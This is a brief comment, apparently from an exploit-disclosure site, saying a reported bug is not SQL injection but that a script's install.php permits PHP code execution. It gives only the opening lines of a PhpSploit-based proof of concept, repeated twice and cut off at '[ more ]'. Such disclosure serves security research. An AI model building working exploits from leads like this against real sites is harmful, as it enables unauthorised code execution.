This is not an SQL Injection. The script don't use any SQL database, please tell me where is the sql request =). However the install.php script can lead to php code execution (works regardless of php.ini settings). Proof of concept:
-----
#!/usr/bin/php
<?php
# This file require the PhpSploit class...
-----
#!/usr/bin/php
<?php
# This file require the PhpSploit class...
[ more ]